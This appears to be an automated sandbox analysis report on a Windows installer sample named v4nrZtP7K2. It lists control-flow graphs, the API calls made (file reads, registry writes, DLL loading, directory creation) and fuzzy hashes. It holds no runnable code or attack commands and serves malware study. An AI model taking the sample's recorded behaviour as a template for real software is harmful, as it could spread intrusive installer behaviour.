                                                                                      control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 656 4017f7-4017f8 call 405eb9 655->656 657 4017fd-401819 call 405ede 655->657 656->657 665 40181b-40181e 657->665 666 40188d-4018b6 call 405450 call 4031d6 657->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 700 401864-401865 667->700 678 401882-401888 668->678 683 402ace 678->683 680->681 682 4018d0-4018db CloseHandle 680->682 681->682 685 4018e1-4018e4 682->685 686 402ac5-402ac8 682->686 687 402ad0-402ad4 683->687 689 4018e6-4018f7 call 40640a lstrcatW 685->689 690 4018f9-4018fc call 40640a 685->690 686->683 697 401901-4022fc call 405a4e 689->697 690->697 697->687 700->678 702 401867-401868 700->702 702->668
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp$C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-2101532624
                                                                                      • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                      • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                      • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                      • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->713 723 4026c4-4026c9 720->723 721->722 725 40273c-402747 call 405fbf 721->725 722->713 732 40275f 722->732 723->713 724 4026cf-4026dd 723->724 727 4026e3-4026f5 MultiByteToWideChar 724->727 728 402798-4027a4 call 40632f 724->728 725->713 725->722 731 4026f7-4026fa 727->731 727->732 728->709 735 4026fc-402707 731->735 737 402762-402765 732->737 735->737 739 402709-40272e SetFilePointer MultiByteToWideChar 735->739 737->728 738 402767-40276c 737->738 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->735 742 402730 739->742 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->732 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                        • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                      • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                      • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                      • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                      • wsprintfW.USER32 ref: 004067A4
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                      • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                      • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                      • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 757 6ffb1777-6ffb17b6 call 6ffb1b5f 761 6ffb17bc-6ffb17c0 757->761 762 6ffb18d6-6ffb18d8 757->762 763 6ffb17c9-6ffb17d6 call 6ffb2394 761->763 764 6ffb17c2-6ffb17c8 call 6ffb2352 761->764 769 6ffb17d8-6ffb17dd 763->769 770 6ffb1806-6ffb180d 763->770 764->763 773 6ffb17f8-6ffb17fb 769->773 774 6ffb17df-6ffb17e0 769->774 771 6ffb180f-6ffb182b call 6ffb2569 call 6ffb15b4 call 6ffb1272 GlobalFree 770->771 772 6ffb182d-6ffb1831 770->772 798 6ffb1885-6ffb1889 771->798 775 6ffb187e-6ffb1884 call 6ffb2569 772->775 776 6ffb1833-6ffb187c call 6ffb15c6 call 6ffb2569 772->776 773->770 777 6ffb17fd-6ffb17fe call 6ffb2d37 773->777 779 6ffb17e8-6ffb17e9 call 6ffb2aac 774->779 780 6ffb17e2-6ffb17e3 774->780 775->798 776->798 792 6ffb1803 777->792 789 6ffb17ee 779->789 781 6ffb17f0-6ffb17f6 call 6ffb2724 780->781 782 6ffb17e5-6ffb17e6 780->782 797 6ffb1805 781->797 782->770 782->779 789->792 792->797 797->770 801 6ffb188b-6ffb1899 call 6ffb252c 798->801 802 6ffb18c6-6ffb18cd 798->802 807 6ffb189b-6ffb189e 801->807 808 6ffb18b1-6ffb18b8 801->808 802->762 804 6ffb18cf-6ffb18d0 GlobalFree 802->804 804->762 807->808 809 6ffb18a0-6ffb18a8 807->809 808->802 810 6ffb18ba-6ffb18c5 call 6ffb153d 808->810 809->808 811 6ffb18aa-6ffb18ab FreeLibrary 809->811 810->802 811->808
                                                                                      APIs
                                                                                        • Part of subcall function 6FFB1B5F: GlobalFree.KERNEL32(?), ref: 6FFB1DB2
                                                                                        • Part of subcall function 6FFB1B5F: GlobalFree.KERNEL32(?), ref: 6FFB1DB7
                                                                                        • Part of subcall function 6FFB1B5F: GlobalFree.KERNEL32(?), ref: 6FFB1DBC
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB1825
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6FFB18AB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FFB18D0
                                                                                        • Part of subcall function 6FFB2352: GlobalAlloc.KERNEL32(00000040,?), ref: 6FFB2383
                                                                                        • Part of subcall function 6FFB2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FFB17F6,00000000), ref: 6FFB27F4
                                                                                        • Part of subcall function 6FFB15C6: wsprintfW.USER32 ref: 6FFB15F4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2081342100.000000006FFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FFB0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2081095935.000000006FFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081452717.000000006FFB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2081508923.000000006FFB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_6ffb0000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3962662361-3916222277
                                                                                      • Opcode ID: 568e80466a82f27c95ef0459fee63ec641566fb81f760d65b313f30dfe7d1966
                                                                                      • Instruction ID: ba668f640f0052782f7c84f3bd891f76d86f8dca539cc4202955577fe54bd4a9
                                                                                      • Opcode Fuzzy Hash: 568e80466a82f27c95ef0459fee63ec641566fb81f760d65b313f30dfe7d1966
                                                                                      • Instruction Fuzzy Hash: B641CE72404305AADF119F76DCC4BC637A8BF06364F14417EE9199E2DADBB9E088C7A4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 814 402032-40203e 815 402044-40205a call 402c41 * 2 814->815 816 4020fd-4020ff 814->816 827 40206a-402079 LoadLibraryExW 815->827 828 40205c-402068 GetModuleHandleW 815->828 817 40224b-402250 call 401423 816->817 823 402ac5-402ad4 817->823 824 40288b-402892 817->824 824->823 829 4020f6-4020f8 827->829 830 40207b-40208a call 406831 827->830 828->827 828->830 829->817 834 4020c5-4020ca call 405450 830->834 835 40208c-402092 830->835 840 4020cf-4020d2 834->840 836 402094-4020a0 call 401423 835->836 837 4020ab-4020be call 6ffb1777 835->837 836->840 848 4020a2-4020a9 836->848 843 4020c0-4020c3 837->843 840->823 841 4020d8-4020e2 call 403a78 840->841 841->823 847 4020e8-4020f1 FreeLibrary 841->847 843->840 847->823 848->840
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID: (x
                                                                                      • API String ID: 334405425-3887252280
                                                                                      • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                      • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                      • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                      • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 850 4023e4-402415 call 402c41 * 2 call 402cd1 857 402ac5-402ad4 850->857 858 40241b-402425 850->858 860 402427-402434 call 402c41 lstrlenW 858->860 861 402438-40243b 858->861 860->861 864 40243d-40244e call 402c1f 861->864 865 40244f-402452 861->865 864->865 866 402463-402477 RegSetValueExW 865->866 867 402454-40245e call 4031d6 865->867 871 402479 866->871 872 40247c-40255d RegCloseKey 866->872 867->866 871->872 872->857 875 40288b-402892 872->875 875->857
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp
                                                                                      • API String ID: 2655323295-2555944993
                                                                                      • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                      • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                      • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                      • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 876 405f0d-405f19 877 405f1a-405f4e GetTickCount GetTempFileNameW 876->877 878 405f50-405f52 877->878 879 405f5d-405f5f 877->879 878->877 881 405f54 878->881 880 405f57-405f5a 879->880 881->880
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF), ref: 00405F46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-2113348990
                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                      • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                      • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 882 401b77-401b82 883 401b84-401b87 882->883 884 401bc8-401bcb 882->884 885 4022e4-4022fc call 40640a call 405a4e 883->885 886 401b8d-401b91 883->886 887 401bf2-401c08 GlobalAlloc call 40640a 884->887 888 401bcd-401bcf 884->888 903 402ad0-402ad4 885->903 886->883 890 401b93-401b95 886->890 895 401c0d-401c1a 887->895 892 401bd5-401bed call 4063e8 GlobalFree 888->892 893 40288b-402892 888->893 890->885 896 401b9b-4029e6 call 4063e8 * 3 890->896 897 402ac5-402ace 892->897 893->897 895->885 895->897 896->897 897->903
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(007828E0), ref: 00401BE7
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: Call$(x
                                                                                      • API String ID: 3394109436-2883625298
                                                                                      • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                      • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                      • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                      • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Enum
                                                                                      • String ID:
                                                                                      • API String ID: 464197530-0
                                                                                      • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                      • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                      • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                      • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                      • GetLastError.KERNEL32 ref: 00405976
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                      • GetLastError.KERNEL32 ref: 00405995
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
